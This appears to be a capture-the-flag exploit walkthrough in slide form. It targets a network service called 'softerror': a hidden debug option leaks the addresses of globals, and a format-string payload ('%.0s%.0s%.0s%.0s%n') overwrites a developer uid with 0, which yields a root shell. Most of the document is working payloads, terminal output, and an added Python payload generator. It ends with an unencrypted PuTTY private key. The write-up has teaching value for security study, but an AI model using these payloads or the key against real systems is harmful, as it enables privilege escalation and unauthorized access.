 4095 ?        00:00:00 dd
 4097 ?        00:00:00 klogd
 4115 ?        00:00:15 dbus-daemon
 4155 ?        00:00:00 atd
 4180 ?        00:00:09 cron
 4187 ?        00:00:00 softerror      <-- /usr/sbin/softerror (# which softerror)
10775 tty1     00:00:00 login
24017 tty1     00:00:00 bash
25887 ?        00:00:00 bash
25907 ?        00:00:00 ps

Development – IDA/HR on softerror

void __cdecl manage_client(int fd)
{
    ...
    while ( 1 )
    {
        fwrite("Please select your choice:\n\t1) See the current tasks\n\t2) Add a task to the list\n\t3) Work as Developer 1\n\t4) Work as Developer 2\nYour choice: ", ...);
        fgets(buf, 512, stdin);
        v1 = strtol(buf, 0, 10);
        if ( (unsigned int)v1 <= 0xD )
        {
            switch ( v1 )
            {
                default:
                    goto LABEL_3;
                case 13:
                    ...
                    __fprintf_chk(..., "When reporting a bug, please include the following information:\nStack: %08x Frame: %08x Buffer: %p [%s]\ndevel1_uid: %p [%u]\ndevel1_gid: %p ...
                    fflush(stdout);
                    continue;
                case 4:
                    chdir(devel2_dir);
                    setgid(devel2_gid);
                    v9 = devel2_uid;
                    goto LABEL_7;
                case 3:
                    chdir(devel1_dir);
                    setgid(devel1_gid);
                    v9 = devel1_uid;
LABEL_7:
                    setuid(v9);
                    execle("/bin/bash", "/bin/bash", "-i", 0, 0);
                    break;
                case 2:
                    ...

Two things matter here: the uid handed to setuid() is read from a global (devel1_uid) rather than hard-coded, and the undocumented option 13 prints that global's address. Whoever can write a 0 into devel1_uid gets a root bash from option 3.

Development – Option 13

root@ubuntuserver:/# telnet 128.198.60.78 1337
Trying 128.198.60.78...
Connected to 128.198.60.78.
Escape character is '^]'.
Please select your choice:
    1) See the current tasks
    2) Add a task to the list
    3) Work as Developer 1
    4) Work as Developer 2
Your choice: 13
When reporting a bug, please include the following information:
Stack: bfa51d3c Frame: bfa51fa8 Buffer: 0xb7f33000 [13]
devel1_uid: 0x804b0d0 [2001]
devel1_gid: 0x804b0d4 [2001]
devel2_uid: 0x804b0dc [2002]
devel2_gid: 0x804b0e0 [2002]

Let's cat /etc/passwd for uid/gid.

Development – format string attack

The task text is later printed with the task itself as the format string, so a task made of %x conversions dumps the stack:

Your choice: 2
Insert your task:
%x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x
Please select your choice:
    1) See the current tasks
    2) Add a task to the list
    3) Work as Developer 1
    4) Work as Developer 2
Your choice: 1
task 1 - kung fu go!
b7f134c0 b7f12ff4 9cf43f8 bfa51df0 b7e23035 9cf43f8 b7f33000 b7f3349b 0 3
b7f134c0 b7f12ff4 9cf43f8 bfa51df0 b7e23035 9cf43f8 b7f33000 b7f3349b 0 3 0 0 bfa51d98 49b 801 0 0 12398 81a4 25207825
123
b7f1f4c0 bfa5bfa8 b7f3f000 b7f3f000 804b0d0 7d1 804b0d4 7d1 804b0dc 7d2 804b0e0 7d2 bfa5bd98 bfa5bfa8 7d1 7d1 0 12398 81a4 25207825 78252078 20782520 25207825 78252078 20782520 25207825 78252078 20782520 25207825 78252078 20782520 25207825 78252078 20782520 25207825

In the last dump, 804b0d0 is the address of devel1_uid from the bug report, followed by its value 7d1 (2001); the repeating 25207825 78252078 20782520 is the "%x %x " task string itself being read back off the stack as little-endian words.

C printf Reference

%[flags][width][.precision][length]specifier

.precision
  .number   For integer specifiers (d, i, o, u, x, X): precision specifies the minimum number of digits to be written. If the value to be written is shorter than this number, the result is padded with leading zeros. The value is not truncated even if the result is longer. A precision of 0 means that no character is written for the value 0.
            For e, E and f specifiers: this is the number of digits to be printed after the decimal point.
            For g and G specifiers: this is the maximum number of significant digits to be printed.
            For s: this is the maximum number of characters to be printed. By default all characters are printed until the ending null character is encountered.
            For c type: it has no effect.
            When no precision is specified, the default is 1. If the period is specified without an explicit value for precision, 0 is assumed.
  .*        The precision is not specified in the format string, but as an additional integer value argument preceding the argument that has to be formatted.

specifier   Output                                                     Example
c           Character                                                  a
d or i      Signed decimal integer                                     392
e           Scientific notation (mantissa/exponent) using e character  3.9265e+2
n           Nothing printed. The argument must be a pointer to a signed int, where the number of characters written so far is stored.
s           String of characters                                       sample

Development – format string attack

b7f1f4c0 bfa5bfa8 b7f3f000 b7f3f000 804b0d0 7d1 804b0d4 7d1 804b0dc 7d2 804b0e0 7d2 bfa5bd98 bfa5bfa8 7d1 7d1

The fifth dword of the dump (bytes 16 to 19) is the pointer to devel1_uid.

%n gives the format string the ability to write the number of characters output so far back through the pointer in the next argument slot. Four %.0s conversions step over the first four slots without printing anything (with precision 0 the strings are never read, so the stale pointers do no harm), and %n then stores 0 through the fifth slot:

%.0s%.0s%.0s%.0s%n   is equivalent to   printf("%.0s%.0s%.0s%.0s%n", 0xb7f1f4c0, 0xbfa5bfa8, 0xb7f3f000, 0xb7f3f000, 0x804b0d0)

Writing 0 into devel1_uid makes option 3 call setuid(0).
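An added example (not from the slides) that models printf's argument walk for just the conversions this attack uses, so the overwrite can be reasoned about offline before touching the service. The argument slots are the sixteen stack words leaked by the %x task above, and the 512-byte limit is the fgets() size from the decompiled manage_client(); the model generalizes the slide's payload to writing any small value through any slot.

```python
"""Added example (not from the slides): a model of printf's argument walk,
restricted to the conversions this attack uses (%x, %d/%u, %.0s, %n). The
argument slots are the stack words leaked by the slide's '%x %x ...' task;
TASK_BUFFER is the fgets() size from the decompiled manage_client()."""
import re

LEAKED = [0xb7f1f4c0, 0xbfa5bfa8, 0xb7f3f000, 0xb7f3f000, 0x804b0d0, 0x7d1,
          0x804b0d4, 0x7d1, 0x804b0dc, 0x7d2, 0x804b0e0, 0x7d2,
          0xbfa5bd98, 0xbfa5bfa8, 0x7d1, 0x7d1]

SPEC = re.compile(r"%(\d*)(?:\.(\d+))?([xdusn])")
TASK_BUFFER = 512


def model_printf(fmt, args, writes):
    """Return the text printf(fmt, *args) would emit. Each conversion consumes
    one slot of args in order; %n records len(output so far) in writes[ptr]."""
    out, pos, slot = [], 0, 0
    for m in SPEC.finditer(fmt):
        out.append(fmt[pos:m.start()])
        pos = m.end()
        width, prec, conv = m.group(1), m.group(2), m.group(3)
        arg, slot = args[slot], slot + 1
        if conv == "n":
            writes[arg] = sum(len(s) for s in out)
        elif conv == "s":
            # Real printf would dereference arg here; with precision 0 glibc
            # never reads the string, which is what makes %.0s a safe slot-skipper.
            if prec != "0":
                raise NotImplementedError("model only steps over strings with %.0s")
        elif conv == "x":
            out.append(format(arg, "x").rjust(int(width or 0)))
        else:                                    # %d / %u
            out.append(str(arg).rjust(int(width or 0)))
    out.append(fmt[pos:])
    return "".join(out)


def uid_overwrite(task, stack=LEAKED):
    """Run a task string as the format and return {address: value_written}."""
    writes = {}
    model_printf(task, stack, writes)
    return writes


def payload_for_value(value, slot=4):
    """Write `value` through the pointer in argument slot `slot` (0-based):
    literal padding sets the character count, %.0s skips the earlier slots,
    %n stores the count. slot=4 is devel1_uid; value 0 is root."""
    task = "A" * value + "%.0s" * slot + "%n"
    if len(task) >= TASK_BUFFER:
        raise ValueError("payload does not fit the 512-byte task buffer")
    return task


if __name__ == "__main__":
    print(model_printf("%x %x %x %x %x", LEAKED, {}))   # reproduces the leak
    print(uid_overwrite("%.0s%.0s%.0s%.0s%n"))           # writes 0 to 0x804b0d0
```

Two more %.0s would move the write to slot 6, the devel1_gid pointer, and the padding trick is how a non-zero uid would be written; the buffer check is there because anything larger than a few hundred needs the width-padding form instead of literal characters, which this model deliberately does not attempt.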

Development – w00t!

Your choice: 2
Insert your task:
%.0s%.0s%.0s%.0s%n
Please select your choice:
    1) See the current tasks
    2) Add a task to the list
    3) Work as Developer 1
    4) Work as Developer 2
Your choice: 1
task 1 - kung fu go!
b7f1f4c0 bfa5bfa8 b7f3f000 b7f3f000 804b0d0 7d1 804b0d4 7d1 804b0dc 7d2

Please select your choice:
    1) See the current tasks
    2) Add a task to the list
    3) Work as Developer 1
    4) Work as Developer 2
Your choice: 13
When reporting a bug, please include the following information:
Stack: bfa5bd3c Frame: bfa5bfa8 Buffer: 0xb7f3f000 [13]
devel1_uid: 0x804b0d0 [0]
devel1_gid: 0x804b0d4 [2001]
devel2_uid: 0x804b0dc [2002]
devel2_gid: 0x804b0e0 [2002]
Please select your choice:
    1) See the current tasks
    2) Add a task to the list
    3) Work as Developer 1
    4) Work as Developer 2
Your choice:

Development – root

Please select your choice:
    1) See the current tasks
    2) Add a task to the list
    3) Work as Developer 1
    4) Work as Developer 2
Your choice: 3
bash: no job control in this shell
root@ubuntuserver:/home/devel1# whoami
root
root@ubuntuserver:/home/devel1#

Now drop SSH keys and go to the bomb.

The Bomb

I'm only one person... We'll leave this as an exercise for someone else to solve.

Questions / Comments

Priv Key

PuTTY-User-Key-File-2: ssh-rsa
Encryption: none
Comment: rsa-key-20091101
Public-Lines: 4
AAAAB3NzaC1yc2EAAAABJQAAAIEAgMy2vBWaoSDYqthD6o4vNve8lMvWg5cs8mD3gPcDBsrrhHu5si6C4C9bsVd2iu/pDgfmNn3g6C1SvjOx4Rzq53LT0ccNfDy8dMsFATgyHC6J9I+B37VaPnHdtEHIrYMM5ig6zvj4eNQzxx0qCxsPXQyI+f1+nC03IOZCmDtH8Hs=
Private-Lines: 8
AAAAgDQ3UQAkbx66SgASfGYCSn4RaCClqf3/BGJC/I46oFyzITW1nk8nnNdtJSw4NvoOO+MX9Yu2fcXo3FryXN64skGRz6iS2bbJ9FdT6l4wyfaO6miXIPbsHvwmEWu4ZvIkyS9jw+mLJVjXy7Ts0T9ooGYf3gcKTFu09w9wG5MWjEVdAAAAQQDa/5+Erk1nnOx6URtgMWl1+lB17jDK0sT1F3U5LyFmuWZeHlmgdERokFkWP49cNdY9iyn94ZSvc+EL7P6B/B0jAAAAQQCWj7ST38FJXmyj2DC0/XStXn/6IDzGOwuFRfEOiown/Nex49/wOSYTE1ppbt9WXvFNL3pdrXqdP7NfZuqjz7DJAAAAQCpfsA2umsMLgQr2xzK4kK8wGlyJe5KjtdAbBK+aClxlMcz7u+TWAKRpdtx30mmjNFkqlcYqiXFdTA1cBpwaQWI=
Private-MAC: 0d2181d38f44af1e77e59bbeeb335318c9cc2cdc